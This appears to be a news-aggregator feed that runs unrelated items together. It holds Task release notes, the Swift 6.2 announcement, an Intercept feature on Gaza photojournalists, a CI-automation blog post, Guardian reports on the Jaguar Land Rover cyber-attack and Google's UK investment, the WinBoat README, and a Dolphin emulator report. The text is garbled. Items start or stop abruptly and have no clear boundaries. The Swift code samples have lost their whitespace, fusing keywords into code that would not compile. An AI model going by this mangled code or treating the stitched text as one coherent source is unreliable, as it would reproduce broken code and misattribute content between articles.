Enhanced support for tasks with wildcards: they are now logged correctly, and wildcard parameters are fully considered during fingerprinting (
#1808
,
#1795
by
@vmaerten
).
We recently released our
official GitHub Action
. This is based on the fantastic work by the Arduino team who created and maintained the community version. Now that this is officially adopted, fixes/updates should be more timely. We have already merged a couple of longstanding PRs in our
first release
(by
@pd93
,
@shrink
,
@trim21
and all the previous contributors to
arduino/setup-task
).
NOTE:
v3.45.0-v3.45.2 were skipped due to issues with our release process.
We’re excited to announce Swift 6.2, a release aimed at making every Swift developer more productive, regardless of where or how you write code. From improved tooling and libraries to enhancements in concurrency and performance, Swift 6.2 delivers a broad set of features designed for real-world development at every layer of the software stack.
Read on for a deep dive into changes to the language, libraries, workflows, platform support, and next steps for getting started with Swift 6.2.
Swift 6.2 lowers the barrier to concurrent programming with a set of changes designed to reduce boilerplate and let you write safe concurrent code more naturally:
Single-threaded by default:
Run your code on the main thread without explicit
@MainActor
annotations using the new option to isolate code to the main actor by default. This option is ideal for scripts, UI code, and other executable targets.
Intuitive
async
functions:
Write async code without concurrent access to mutable state. Previously,
nonisolated async
methods always switched to the global executor that manages the concurrent thread pool, which made it difficult to write async methods for class types without data-race safety errors. In Swift 6.2, you can migrate to an
upcoming feature
where
async
functions run in the caller’s execution context, even when called on the main actor.
Opting into concurrency with
@concurrent
:
Introduce code that runs concurrently using the new
@concurrent
attribute. This makes it clear when you want code to remain serialized on actor, and when code may run in parallel.
// In '-default-isolation MainActor' modestructImage{// The image cache is safe because it's protected// by the main actor.staticvarcachedImage:[URL:Image]=[:]staticfunccreate(fromurl:URL)asyncthrows->Image{ifletimage=cachedImage[url]{returnimage}letimage=tryawaitfetchImage(at:url)cachedImage[url]=imagereturnimage}// Fetch the data from the given URL and decode it.// This is performed on the concurrent thread pool to// keep the main actor free while decoding large images.@concurrentstaticfuncfetchImage(aturl:URL)asyncthrows->Image{let(data,_)=tryawaitURLSession.shared.data(from:url)returnawaitdecode(data:data)}}
Together, these improvements let you write data-race free code with less annotation overhead, provide more predictable behavior for async code, while still allowing you to introduce concurrency when you need it.
Swift 6.2 includes features designed to maximize performance without compromising safety. These features help you write safe, low-level code with predictable performance and minimal overhead.
InlineArray
is a new fixed-size array with inline storage for elements, which can be stored on the stack or directly within other types without additional heap allocation. You can introduce an inline array by writing the size in angle brackets before the element, or by using the
of
shorthand syntax:
structGame{// Shorthand for InlineArray<40, Sprite>varbricks:[40ofSprite]init(_brickSprite:Sprite){bricks=.init(repeating:brickSprite)}}
The new
Span
type offers safe, direct access to contiguous memory. Span maintains memory safety by ensuring the memory remains valid while you’re using it. These guarantees are checked at compile time with no runtime overhead, and define away the memory safety problems inherent to pointers, such as use-after-free bugs.
Swift 6.2 enhances its capabilities for low-level and security-critical projects beyond new APIs:
Embedded Swift:
Embedded Swift now includes Swift’s full
String
APIs,
any
types for class-constrained protocols, and the new
InlineArray
and
Span
types.
Opt-in strict memory safety:
Swift has provided memory safety since its inception, while allowing use of unsafe constructs like unsafe pointers when needed, such as using a C API that accepts pointers. Swift 6.2 introduces
opt-in strict memory safety
, which flags uses of unsafe constructs, so you can replace them with safe alternatives or explicitly acknowledge them in source code. It’s opt-in because the majority of projects don’t need this level of enforcement — strict memory safety is best left for projects with the strongest security requirements.
Beyond language improvements, Swift 6.2 smooths the day-to-day iteration cycle of editing, building, and debugging code.
The
Swift extension for VS Code
is now officially verified and distributed by Swift.org. The latest version of the extension includes:
Background indexing by default:
Write code with fast, always-up-to-date editor features like jump-to-definition and code completion.
Built-in LLDB debugging:
Step through Swift code, set breakpoints, and inspect state using LLDB right inside VS Code.
Swift project panel:
Navigate your Swift project’s targets, dependencies, and tasks in the Explorer view.
Live DocC preview:
Preview your rendered documentation side-by-side with your code, updated live as you type.
These workflow improvements make it easier to work on Swift projects in your environment of choice with first-class tooling.
Swift 6.2 introduces enhances how you manage compiler warnings by allowing control at the
diagnostic group
level. A diagnostic group is a category of warnings identified by a name. You can specify the desired behavior of warnings in a diagnostic group in a Swift package manifest using the
treatWarning
method on
SwiftSetting
, or promote all warnings to errors using the
treatAllWarnings
method. For example, you can promote all warnings to errors except for warnings about uses of deprecated APIs:
Swift 6.2 significantly improves clean build times for projects that use macro-based APIs. Previously, the build system had to first fetch and build the swift-syntax package from source before building the macro project, which noticeably lengthened compile times, especially in CI environments. SwiftPM now supports pre-built swift-syntax dependencies, completely eliminating an expensive build step.
Swift 6.2 makes it much easier to follow what’s happening in concurrent code when debugging with LLDB:
Robust
async
stepping:
Reliably step into asynchronous functions in LLDB, even when the async call requires switching threads.
Surfacing task context:
See which task a piece of code is running on when stopped at a breakpoint and when viewing the backtrace for the current thread.
Named tasks:
Assign human-readable names when creating tasks, which are surfaced in the task context in debugging and profiling tools.
Swift 6.2 includes
migration tooling
to help you adopt upcoming language features:
Identify source incompatibility:
Identify code patterns that will no longer compile or change behavior when the upcoming feature is enabled through warnings from migration tooling.
Automate code changes:
Apply fix-its to update your code to preserve its existing behavior.
This streamlines the process of enabling upcoming features by eliminating the tedious task of manual code changes. You can learn more about migration tooling in the
Swift migration guide
.
Whether you’re managing external processes, reacting to state changes, or writing test suites, the Swift 6.2 libraries are evolving to help you write cleaner and safer code.
Swift 6.2 introduces a new
Subprocess
package that offers a streamlined, concurrency‑friendly API for launching and managing external processes. This includes APIs built with async/await, fine-grained control over process execution, platform-specific configuration, and more—ideal for scripting, automation, and server‑side tasks:
Explore the full API surface for version 0.1 in the
swift-subprocess repository
, and feedback from your adoption will inform the API that is released in version 1.0.
In Swift 6.2, the Foundation library includes a modern
NotificationCenter
API that uses concrete notification types instead of relying on strings and untyped dictionaries for notification names and payloads. This means you can define a notification struct with stored properties, and observers can use the type without error-prone indexing and dynamic casting. Notification types also specify whether they’re posted synchronously on the main actor or asynchronously through a conformance to
MainActorMessage
or
AsyncMessage
, which eliminates concurrency errors when working with main actor notifications.
Swift 6.2 enables streaming transactional state changes of observable types using the new
Observations
async sequence type. Updates include all synchronous changes to the observable properties, and the transaction ends at the next
await
that suspends. This avoids redundant UI updates, improves performance, and ensures that your code reacts to a consistent snapshot of the value.
Swift Testing in Swift 6.2 adds new APIs for enhanced expressivity in your tests and test results:
Exit testing
lets you verify that code terminates under specific conditions, such as a failed precondition. Your exit tests run in a new process and validate that the exit behavior is what you expect, making it possible to exercise critical failure paths like you would in any other test.
Attachments
let you include additional context in test results, including strings, images, logs, and other artifacts, surfaced in test reports or written to disk. This makes it easier to diagnose failures with concrete evidence—whether that’s a screenshot of a UI state, a JSON payload, or a trace of steps leading up to the issue.
Swift 6.2 gains support for WebAssembly, also known as Wasm. WebAssembly is a virtual machine platform focused on portability, security, and high performance. You can build both client and server applications for Wasm and deploy to the browser or other runtimes. Learn more about Wasm in the
vision for WebAssembly support in Swift
.
Thank you to everyone who shared their experiences, frustrations, and insights that guided the design of Swift 6.2, especially the approachable concurrency model. Your feedback made it clear where the language could be friendlier, where safety needed to feel more natural, and where the tools could make you more productive. The improvements in Swift 6.2 are only possible because of your voices.
If you’re excited about where Swift is headed, there’s no better time to get involved in the Swift community. From participating in Swift Evolution, to contributing code on GitHub, or sharing feedback on how the language feels in real-world projects, every voice helps shape Swift’s future. Whether you’re a seasoned programmer or just starting out, our community thrives on collaboration and welcomes new perspectives. Join in, learn from others, and help make Swift a better language.
Ready to upgrade? Install the latest toolchain using Swiftly
swiftly install 6.2
or
Swift.org/install
and start exploring Swift 6.2 today.
Author
Holly Borla is a member of the Swift Core Team and Language Steering Group, and the engineering manager of the Swift language team at Apple.
Continue Reading
“They Fear Our Lenses”: Gaza Photojournalists Speak Out
Intercept
theintercept.com
2025-09-16 10:02:00
Photographers in Gaza risk their lives to witness the war. Their images speak louder than the critics trying to discredit them.
The post “They Fear Our Lenses”: Gaza Photojournalists Speak Out appeared first on The Intercept....
Ibrahim Nofal’s photograph of his mother, Muneera, receiving treatment on June 20, 2025, after being hit by shrapnel from an Israeli attack. She died shortly after.
Photo: Ibrahim Nofal
Israel killed six
journalists with an airstrike on a press tent in Gaza City last month. Among the dead in the August 10 attack were
Al Jazeera correspondent Anas Al-Sharif
and his colleague, photojournalist Mohammad Nofal.
In the days leading up to the killing, I had been speaking with Mohamed’s brother and fellow photojournalist, Ibrahim Nofal, 27, about what it’s like to be a photojournalist in Gaza today, to witness horror and massacres.
“This is the only thing I know how to do,” he said. “Every person here has a role in this war. Mine is to document. If I don’t photograph it, this moment will never exist.”
The day after Israel killed his brother, I asked Ibrahim what he misses most. He immediately responded: “My mother and my brothers Omar and Mohammad, who were killed in this genocide. I had a life in Turkey when I was traveling; I had plans. But none of it matters now. Only my mother and brothers do.”
I and my own brother, Ali Skaik, spoke with Ibrahim and five other photojournalists in Gaza about their daily lives and what the deadly task of documenting the genocide means to them. We also asked them to share one photo that is close to their hearts. I fear that any of them may join the ranks of the
221 other journalists
that Israel has killed in Gaza in the past two years. I fear that I and my brother could be killed any day too, as the Israeli military advances closer to our home.
Ibrahim Nofal
Photo: Courtesy of Ibrahim Nofal
Ibrahim is still working, despite the risks. He’s come close to death before. “Once, a gas canister exploded beside me — I thought it was the end. Another time, a house we were documenting was hit, and everyone around me was injured,” he said. His home was bombed on October 30, 2023, and five of his cameras were destroyed.
His photos have not only traveled far, they have changed lives: Some of those he photographed were able to leave Gaza for medical treatment because the world saw their suffering.
He keeps documenting. “The camera is my weapon,” he said. “It respects me because I respect it. Through it, I make the world see Gaza and its people.”
Documenting the genocide is not a choice — it is a responsibility, carried out with a sense of duty and love for our homeland and people. In Gaza, every image carries a cost, and every photographer bears both the burden of memory and the duty of witness.
Yazan Abu Foul, a 2-year-old resident of Al-Shati refugee camp, suffering from severe malnutrition amid widespread famine in the Gaza Strip on July 19, 2025.
Photo: Abdul Hakim Abu Riash
Abdul Hakim Abu Riash, 37, captured a searing photograph of starvation in Gaza: the image of 2-year-old Yazan Abu Foul in the Al-Shati refugee camp, suffering from severe malnutrition.
Abu Riash in his press gear.
Photo: Courtesy of Abdul Hakim Abu Riash
“The reality, however, is far harsher than what has been reported,” Abu Riash said. “During the most recent closure of the crossings, I myself lost 13 kilograms — my weight dropped from 67 to nearly 53” kilograms, or from 147 to 117 pounds. Food remains scarce, with prices 10 times higher than before the Israeli restriction of food. “If this is my condition as an adult, one can only imagine the plight of children, especially those with chronic illnesses who rely on specific nutritional needs,” he said. “Their suffering is far greater, and under this blockade and the denial of food entry, their situation is only worsening — leading already to the deaths of dozens of children.”
“I risk my life and everything I own to share realities that cannot be hidden behind propaganda,” he said. “We’ve had to learn new lessons on how to adapt in the field, to keep working under almost impossible conditions, and to find ways of ensuring our message still reaches the world.”C
He traces his love for photography back to his boyhood in Beit Lahia in the northern Gaza Strip. His first mobile phone with a camera, bought in 2005, felt like a miracle, he said. He was capturing photos of nature in Beit Lahia, sunsets, and daily life scenes. By 2011, after the first war on Gaza, he turned his passion into journalism, determined to document the truth.
For Abu Riash, images touch emotions before they reach the mind. “A photograph speaks to everyone — even the blind can feel its weight through silence. It’s the world’s only common language,” he said.
One particular image left a mark on Abu Riash: a photograph of a young girl embracing the bodies of her family members, killed in an Israeli airstrike on their home in Deir al-Balah. The shock was etched on her face, her grief uncontainable. “Every photo I take is a witness for history. I want the world to see the truth: the suffering of my people and their resilience. Nothing less,” he said.
“The Truth Is Our Weapon”
Men gather around the body of slain photojournalist Anas Al-Sharif at his funeral on Aug. 11, 2025, following an Israeli attack on the press tent in Gaza City.
Photo: Ayman al-Hessi
For Ayman Majed al-Hessi, 32, photojournalism was imposed on him. He studied electronics engineering and Islamic sciences before life pushed him into the media. Since 2018, he has worked with Al Jazeera Mubasher and captured beauty and wars, drawn by the belief that images have more power than words. “When I photograph, I’m not documenting strangers. I’m documenting my people, my father, my mother, my siblings, and my neighbors,” he said.
He has lived through multiple wars, but the current one has been different. He has been injured three times since October 2023, the first during the early days of the war while covering Al-Shati refugee camp. “I moved from being a reporter to a photojournalist overnight,” al-Hessi recalled, “but also to a survivor.”
Ayman al-Hessi
Photo: Courtesy of Ayman al-Hessi
His cameras and equipment were destroyed when his family home was bombed. With no tools, he resorted to a cheap Xiaomi phone, yet even from that device, he broadcast some of the most haunting images of Gaza’s devastation. One of al-Hessi’s widely circulated images is the targeting of journalist Ismail Al-Ghoul. After photographing a massacre, the images linger in al-Hessi’s mind, preventing restful sleep.
“The Israeli occupation tries to silence us. They accuse us of using artificial intelligence when we show famine,” al-Hessi added, “they close our social media accounts and keep threatening us. But our responsibility is to show the world what is happening. The truth is our weapon.”
“Images are stronger than texts,” al-Hessi said. “If I describe a flower, you’ll imagine one thing. But if I show it, the truth is undeniable. The occupation knows this. That’s why they fear our lenses.”
There are many images that have stayed with al-Hessi, but the harshest of all was the moment his brother Akram was killed. “I was filming the aftermath of an airstrike on the Shati refugee camp. People around me were shouting his name: ‘Akram, Akram!’ When I reached the site, I found my brother Akram lying lifeless, and my father clutching his body, screaming in anguish,” remembered al-Hessi.
The weight of loss bleeds into his words. He has lost his brother, his uncle, and 50 close friends. “I miss everything,” he admitted. “Our homes, our places, the people we lost.” Yet still he photographs, because if he doesn’t, no one will know. “Every photo is not just for history,” he said. “It’s for my family, my neighbors, my people.”
“Before, I Looked for Beauty and Daily Life”
Two little friends walk hand in hand through the rubble of Suhail Nassar’s Gaza neighborhood, Tel al-Hawa, on March 20, 2025.
Photo: Suhail Nassar
Suhail Nassar, 30, is a photojournalist who used to capture Gaza’s hidden beauty: the laughter of children, sunsets over the Mediterranean, fleeting moments of joy. Photography began as a hobby for him, until he became a photojournalist to show the world how the people of Gaza live.
Suhail Nassar
Photo: Courtesy of Suhail Nassar
Since October 7, 2023, his lens has shifted. “Before, I looked for beauty and daily life. Now, everything I shoot is death, hunger, and ruins,” Nassar said. Direct bombardment, lack of supplies, and the absence of safety anywhere are great risks for photojournalists in Gaza. Yet the worst risk for them is becoming a target simply because of carrying their cameras. “There is no true protection here; you try to pick safe angles, move quickly, and keep your eyes on all directions.”
“You don’t really deal with the trauma,” Nassar said. “You carry it with you. The pictures stay in your head, stronger than any archive.”
But he feels compelled to document reality as it is. “If we do not document, no one will know what happens to us. Silence erases us. I photograph so that no one can ever say, ‘We didn’t know,’” Nassar said.
“These Moments Break You”
Mohammed Hijazi sits in his home in Jabalia refugee camp on April 19, 2025.
Photo: Anas Fteiha
Anas Fteiha
, 31, is a photojournalist from Gaza who works for the Turkish Anadolu Agency. Fteiha never imagined that his profession would demand such sacrifice. He moves constantly between hospitals, bomb sites, and displacement camps.
He recalls one haunting moment: a little girl who had lost both her arms. When another explosion thundered nearby, her instinct was to cover her ears — only to realize she no longer could. “These moments break you,” he admitted. “But they also remind you why you must keep going.”
Anas Fteiha
Photo: Courtesy of Anas Fteiha
“A photo invades your consciousness before you even ask. People may forget articles they read, but they will never forget an image,” Fteiha said. He is
currently suing
global publishing giant Axel Springer for an article in their German tabloid, BILD, that accused him of being a Hamas propagandist. Axel Springer also owns U.S. publications Politico and Business Insider.
The greatest challenges are the lack of safety, frequent electricity and internet outages, and the difficulty of reaching event sites amid continuous bombardment. “I try to separate work from emotions, but it is extremely difficult. Sometimes, after shooting, I feel an internal collapse. I console myself with the thought that what I do has value and meaning, and that my pain cannot be compared to the suffering of those I document,” recounted Fteiha.
There are no “neutral zones” in Gaza; every area is dangerous. “The greatest danger is being directly targeted. Many colleagues have been injured or killed while covering events,” Fteiha said. He doesn’t want the world to see Palestinians as just a political issue, but as fathers, mothers, and children who deserve dignity.
He described his mission as more than work — it is duty. “Every image I capture might become a voice for the voiceless and could help convey the suffering of people who would otherwise remain invisible or ignored,” he said. “If we stop documenting, who will show the world what’s happening here in Gaza?”
“Louder Than Words”
A dead child in Gaza’s Al-Shati refugee camp on June 19, 2025, killed by Israeli fire while playing in the summer heat.
Photo: Motasem Abu Aser
Motasem Abu Aser, 30, is a documentary filmmaker and short story creator.
Photography began as an obsession for him. From childhood, he felt drawn to the camera. His heart always belonged to visual storytelling. After surviving a near-fatal head injury while covering the
Great March of Return in 2018
, he refused to stop. “People thought I would quit journalism after that, but the fear was erased. Nothing could scare me anymore,” he asserts.
Motasem Abu Aser
Photo: Courtesy of Motasem Abu Aser
His work on “
The Night Won’t End
,” an Al Jazeera documentary that included the story of 6-year-old Hind Rajab, trapped under bombardment, became one of his most powerful works. “When you film in the moment, you capture history as it burns. That is why our work has meaning,” he highlights.
Since October 7, his days have blurred into endless hours of work. He rarely sleeps, sometimes only half an hour at a time; he feels as if he works 24 hours a day. “As a filmmaker, I don’t just hold a camera — I carry images in my mind constantly. Sleep is fleeting; even with eyes closed, my mind remains alert,” he recounts.
At the Anan family massacre near Saraya Street
in December 2023
, Abu Aser was the first to document the atrocity. Soldiers lined women and girls on a billiard table, bound them, and shot at them randomly. Men were trapped under stairs and exposed to explosives, killed slowly. “Images always speak louder than words. Often, a photo alone suffices; a caption may not even be needed,” said Abu Aser.
For a long time, we had a recurring TODO in our calendar: once a month, check whether any
Linux distro we test against
got a new stable version—or dropped support for an old one.
Sounds simple. In reality, it was annoying, error-prone, and we were always late. Someone had to remember, look up release notes, update our CI matrix, and push a commit. Sometimes we missed a release for weeks, even months. Sometimes we forgot to remove an EOL version. It was busywork, not engineering.
It gives you a structured JSON about supported and upcoming releases. Exactly what we needed: a single place to know what’s alive and what’s dead.
Step 2: Update CI automatically
We wrote
a GitHub Action
that queries this API, parses the versions, and updates our CI matrix. The action runs every week, so our testing matrix is always fresh.
Instead of telling people “remember to bump Ubuntu when a new LTS comes out,” the pipeline does it for us.
Step 3: Open a PR, not a mystery commit
Nobody likes automation silently pushing to
main
. We used
peter-evans/create-pull-request
to have the action open a PR with the changes.
That way:
We can see exactly which versions got added/removed.
Tests run as usual.
If something breaks,
main
stays intact. A human is kept in the loop, in charge of merging the PR.
Step 4: Watchdog for the watchdog
One last problem: what if the action itself fails?
A broken script could silently stop updating distros, and we wouldn’t notice until we’re back to being weeks out of date. To prevent that, we hooked the action up to
Dead Man’s Snitch
.
If the action stops reporting, we get pinged in Slack. So even the automation is monitored.
Done!
No more monthly TODOs. No more late updates. No more “oops, we’re still testing against an unsupported Debian.”
Our CI matrix now always tracks the current stable versions, with almost zero manual work. And we get to spend our time on actual engineering instead of distro babysitting.
Neyts is the Pareto Security co-founder and Tech Lead.
Jaguar Land Rover extends production shutdown after cyber-attack
Guardian
www.theguardian.com
2025-09-16 09:04:39
Carmaker says it will freeze production until at least 24 September as it continues investigationsBusiness live – latest updatesJaguar Land Rover has extended its shutdown on car production, as Britain’s biggest carmaker grapples with the aftermath of a cyber-attack. JLR said on Tuesday it would fre...
Jaguar Land Rover has extended its shutdown on car production, as Britain’s biggest carmaker grapples with the aftermath of a cyber-attack.
JLR said on Tuesday it would freeze production until at least next Wednesday, 24 September, as it continues its investigations into the hack, which first emerged earlier this month.
The manufacturer said: “We have taken this decision as our forensic investigation of the cyber incident continues, and as we consider the different stages of the controlled restart of our global operations, which will take time.
“We are very sorry for the continued disruption this incident is causing and we will continue to update as the investigation progresses.”
JLR, which is owned by India’s Tata group, stopped production at its sites after discovering hackers had infiltrated its systems a few weeks ago.
The company has since found
the attack has affected “some data”
, although it said it could not provide more details of what data was affected, or if customers’ or suppliers’ information was stolen, but that it would contact anyone affected.
The costs of the cyber-attack are likely building for JLR, as production at its factories in the Midlands and Merseyside are put on hold. Other production facilities around the world have also been affected, fuelling speculation that it could be weeks until systems are operational.
The freeze has also affected suppliers and retailers for JLR, with some operating without computer systems and databases normally used for sourcing spare parts for garages or registering vehicles.
Last week, the Unite union warned that thousands of workers in the JLR supply chain were at risk of losing their livelihoods, and urged the government to step in with a furlough scheme to support them.
Disruption from the cyber-attack
could last until October
. Thousands of JLR production workers have been told not to come in to work, and reports suggest ta number of the company’s suppliers have also had to tell their staff to stay at home.
The shutdown has reportedly led to JLR missing out on production of 1,000 cars a day, losing £72m each day in sales.
A group of hackers, linked to other serious hacks this year on retailers including Marks & Spencer, have
claimed responsibility
for the attack on JLR. Screenshots which are allegedly of JLR’s internal IT systems were posted on a Telegram channel that combined the names of groups of hackers known as Scattered Spider, Lapsus$ and ShinyHunters.
The disruption at JLR comes as it faces falling profits amid the impact of US tariffs and declining sales. The carmaker reported that underlying pre-tax profits dropped 49% to £351m in the three months to June. That included a period when the
company temporarily paused exports to the US
.
We are writing the next chapter in Computing with six technology roadmaps that will bring a new era of performance and efficiency to information technology and business.
AP Live: View from Gaza as Israel Begins Expanded Operation in Gaza City
Google announces £5bn AI investment in UK before Trump visit
Guardian
www.theguardian.com
2025-09-16 08:00:40
Rachel Reeves says move is a ‘vote of confidence’ in British economy as she prepares to open firm’s first UK datacentreBusiness live – latest updatesGoogle has said it will invest £5bn in the UK in the next two years to help meet growing demand for artificial intelligence services, in a boost for th...
Google has said it will invest £5bn in the UK in the next two years to help meet growing demand for artificial intelligence services, in a boost for the government.
The investment, which comes as Google opens its new datacentre in Waltham Cross in Hertfordshire, is expected to contribute to the creation of thousands of jobs, the US tech company said.
The chancellor, Rachel Reeves – who is attempting to drive growth amid
pressure over the lacklustre state of the UK economy
- said the investment into research and development, capital expenditure and engineering was a “vote of confidence” in the UK economy.
The US president, Donald Trump, begins his official state visit to the UK on Tuesday, and the ChatGPT parent firm, OpenAI, and the chip designer Nvidia will this week also reportedly announce billions of dollars’ worth of investment into British datacentres.
On Tuesday, Google said it would pump £5bn into capital expenditure, research and development, and related engineering over the next two years, which would include “pioneering” AI research in science and healthcare through its Google DeepMind operation.
The Silicon Valley company said the investment would help the UK grow its AI economy and contribute to technological breakthroughs, improvements in cybersecurity and job creation.
Google predicted the investment would help to create 8,250 jobs annually at UK businesses.
Reeves will officially open the company’s first UK datacentre in Waltham Cross on Tuesday, amid growing demand for Google’s Cloud, Workspace, Search and Maps services.
Google said it would partner with Shell to help it manage its renewable energy supply in the UK.
The Guardian
reported on Monday
that a new
Google
datacentre in Essex was expected to emit more than half a million tonnes of carbon dioxide a year.
Reeves will also
host the bosses of top US and UK financial companies
in Downing Street on Tuesday. The meeting, which will be hosted jointly by the US Treasury secretary, Scott Bessent, will be attended by senior figures from BlackRock, Barclays and Blackstone.
Trump will make a two-day visit to the UK, which will include a series of business events, as well as a state banquet with tech bosses and senior cabinet ministers on Wednesday evening. The US president will then travel to Chequers on Thursday for a business reception, working lunch and press conference with Keir Starmer.
Google’s £5bn investment comes amid a wider increase in its capital expenditure budget, with the company telling investors in July it expected to invest about $85bn in its 2025 financial year, compared with a previous estimate of £75bn.
On Monday, its parent company,
Alphabet
, became the fourth business to surpass a market capitalisation of $3tn, joining fellow tech companies Nvidia, Microsoft and Apple.
Reeves said: “Google’s £5bn investment is a powerful vote of confidence in the UK economy and the strength of our partnership with the US, creating jobs and economic growth for years to come.
“This government is reversing decades of underinvestment that has held us back for too long, by slashing burdensome red tape, delivering bold reforms of the planning system and investing in better tech to unlock better jobs and opportunities.”
The Google DeepMind co-founder and chief executive, Demis Hassabis, said: “We founded DeepMind in London because we knew the UK had the potential and talent to be a global hub for pioneering AI.
“The UK has a rich history of being at the forefront of technology – from Lovelace to Babbage to Turing – so it’s fitting that we’re continuing that legacy by investing in the next wave of innovation and scientific discovery in the UK.”
winboat: Run Windows apps on Linux with seamless integration
Windows for Penguins.
Run Windows apps on 🐧 Linux with ✨ seamless integration
Screenshots
⚠️
Work in Progress
⚠️
WinBoat is currently in beta, so expect to occasionally run into hiccups and bugs. You should be comfortable with some level of troubleshooting if you decide to try it, however we encourage you to give it a shot anyway.
Features
🎨 Elegant Interface
: Sleek and intuitive interface that seamlessly integrates Windows into your Linux desktop environment, making it feel like a native experience
📦 Automated Installs
: Simple installation process through our interface - pick your preferences & specs and let us handle the rest
🚀 Run Any App
: If it runs on Windows, it can run on WinBoat. Enjoy the full range of Windows applications as native OS-level windows in your Linux environment
🖥️ Full Windows Desktop
: Access the complete Windows desktop experience when you need it, or run individual apps seamlessly integrated into your Linux workflow
📁 Filesystem Integration
: Your home directory is mounted in Windows, allowing easy file sharing between the two systems without any hassle
✨ And many more
: Smartcard passthrough, resource monitoring, and more features being added regularly
How Does It Work?
WinBoat is an Electron app which allows you to run Windows apps on Linux using a containerized approach. Windows runs as a VM inside a Docker container, we communicate with it using the
WinBoat Guest Server
to retrieve data we need from Windows. For compositing applications as native OS-level windows, we use FreeRDP together with Windows's RemoteApp protocol.
Prerequisites
Before running WinBoat, ensure your system meets the following requirements:
Additionally, for development you need to have NodeJS and Go installed on your system
Clone the repo (
git clone https://github.com/TibixDev/WinBoat
)
Install the dependencies (
npm i
)
Build the guest server (
npm run build-guest-server
)
Run the app (
npm run dev
)
Contributing
Contributions are welcome! Whether it's bug fixes, feature improvements, or documentation updates, we appreciate your help making WinBoat better.
Please note
: We maintain a focus on technical contributions only. Pull requests containing political/sexual content, or other sensitive/controversial topics will not be accepted. Let's keep things focused on making great software! 🚀
Feel free to:
Report bugs and issues
Submit feature requests
Contribute code improvements
Help with documentation
Share feedback and suggestions
Check out our issues page to get started, or feel free to open a new issue if you've found something that needs attention.
These past few years some cool projects have surfaced with similar concepts, some of which we've also taken inspirations from.
They're awesome and you should check them out:
The Dolphin Blog is full of stories surrounding games, their development, and the challenges they present to emulate them. And in these stories, we sometimes have some recurring characters that we gain a better understanding of over time. Factor 5 and their
Star Wars: Rogue Squadron
games continue to amaze us time and time again as we find different ways that they push the hardware to its limits.
The Legend of Zelda: The Wind Waker
uses many graphical tricks to create a timeless style, that surprise again in again with just how much care was put into every detail. And, of course the
Metroid Prime
series shows up often given its sensitivity to even subtle changes to emulation.
However, as with every story, there have to be villains as well. One such
villain
is the
The Disney Trio of Destruction™
. For years, users have awaited the final showdown with these games. And guess what? They're finally playable
right now
. But are these games truly villains? Or were they just misunderstood? In this report, we dive into The Disney Trio of Destruction™ once and for all to determine their true nature.
Not every returning character is a game. Sometimes we also have to deal with our own issues, such as
Dual Core mode
. It is constantly breaking games, disabled in many popular games by default, and the source of most crashes in Dolphin. But is Dual Core really a hack? Or is Dolphin simply doing something wrong. In this report, we'll dive into the history of Dual Core and make a change that was long overdue.
On top of all of this, several longstanding features in Dolphin also saw some major upgrades, and we'll also get to those throughout the Dolphin Progress Report. With that, let us begin.
Since the release of the Nintendo Switch 2, we have been repeatedly asked if Dolphin supports the
Nintendo Switch 2 NSO GameCube Controller
. The short answer is not yet. The long answer is that Switch 2 controllers do some weird things; rather than take this on ourselves, we are waiting for the professionals at SDL to figure it all out. Currently they have an implementation, but it's early and missing features. Once they get it to a good place and it is in an SDL release, we will adopt it into Dolphin.
It is no secret that Dual Core mode in Dolphin is unstable. If you've ever had Dolphin randomly crash while going into fullscreen, switching windows, or simply for no apparant reason, you've likely run into a Dual Core crash. In fact, pretty much any time someone comes to us with a crash, the first thing we tell them is to turn off Dual Core.
However, we doubt users understand the full extent of the problem.
But if Dual Core mode is so bad, why haven't we removed it?
For all of its downsides,
Dual Core is fast
. Dolphin is largely bound by single thread performance, leaving the many cores of a modern CPU sitting idle. Splitting our primary emulation thread in two can spread the load across more cores and better fit modern CPU designs. This is very effective, and was in fact
necessary
in the early days to get playable speeds
at all
, and some users still rely on it even today.
Instead, we have tried to
fix
Dual Core repeatedly over the years. The most successful of those efforts was
Synchronize GPU Thread
(SyncGPU). Never heard of it before? Well, that's because despite being the most successful of our efforts, it didn't exactly catch on.
In a typical game, SyncGPU is in-between Dual Core and Single Core, in every sense. And that's the feature's biggest failing. It's neither as stable as Single Core nor as fast as Dual Core, and ends up appealing to neither group. In a game with Dual Core instability that SyncGPU was designed to solve -
Metroid Prime 2
in the graph above - it performs no better than Single Core mode, yet isn't as stable. To make matters worse, the additional synchronization between threads creates
stutters
, so SyncGPU
feels
worse than Single Core or Dual Core.
So, what's the solution to this problem? We can't make Single Core mode faster without making it less stable, and we can't make Dual Core mode more stable without slowing it down. This has been troubing us for many years.
Fortunately, time has provided us with an alternative. You may have noticed from the graph above that all three processor emulation techniques are
way beyond full speed
. In 2025, most of our desktop users have PCs that are
overpowered
for Dolphin. We are at the point where many of our users can comfortably use Single Core at full speed, but most
don't
because it's not the default. So why not do just that?
We have finally made the decision to disable Dual Core mode by default on desktop. We'd much rather have users mutter about Dolphin being slower than be heartbroken over lost save data caused by a setting they didn't even realize existed. If your computer isn't powerful enough and you need the speed, feel free to turn it back on at your own risk.
If you are on Android, we realize the situation is a bit different on that platform. With all the other things that Android users have to deal with - suspect graphics drivers, aggressive CPU governors, and generally weaker hardware, to name a few - we don't think it's time to swap the default there yet. As such, Dual Core will remain enabled by default on Android for the foreseeable future.
Now, you may be reading this and thinking
why is Dual Core bad?
In the process of writing this article, we decided to split the more technical discussion into its own section. You can find an in-depth dive into Dual Core mode and why it is so unstable at the bottom of this report. Feel free to zip straight to it with
this handy link
if you're interested!
Back in 2022,
xperia64
made a slew of improvements to Dolphin's DSP accelerator code. Unfortunately, due to the difficulty of reviewing code like this and the fact that it had little in the way of visible results, it wasn't merged right away. Additionally, earlier this year, a bug was found in the original pull request that caused audio to be missing in certain cases.
However, after finally receiving approvals from several reviewers along with additional fixes and testing, it was finally merged as
2503-509
as a seemingly low-risk addition before the next release. Even though this code would globally affect DSP-HLE, DSP-LLE Recompiler, and DSP-LLE Interpreter, we unfortunately didn't test the less commonly used backends nearly as much as we should have.
While DSP-HLE and DSP-LLE Interpreter were both fine, oversights in how DSP-LLE Recompiler handled exceptions caused hangs in select titles after the improvements. While we don't recommend using the DSP-LLE backends due to how performance intensive they are, there is one major reason to do so: Surround Sound support. Users using DSP-LLE Recompiler for that feature found that their games weren't booting in the 2506 release.
After realizing what was wrong,
AdmiralCurtiss
jumped into action with two hotfixes to how the DSP-LLE Recompiler handled exceptions. One was simply updating the recompiler to allow for exceptions on store instructions, while the other had to do with exception flag handling in specific cases.
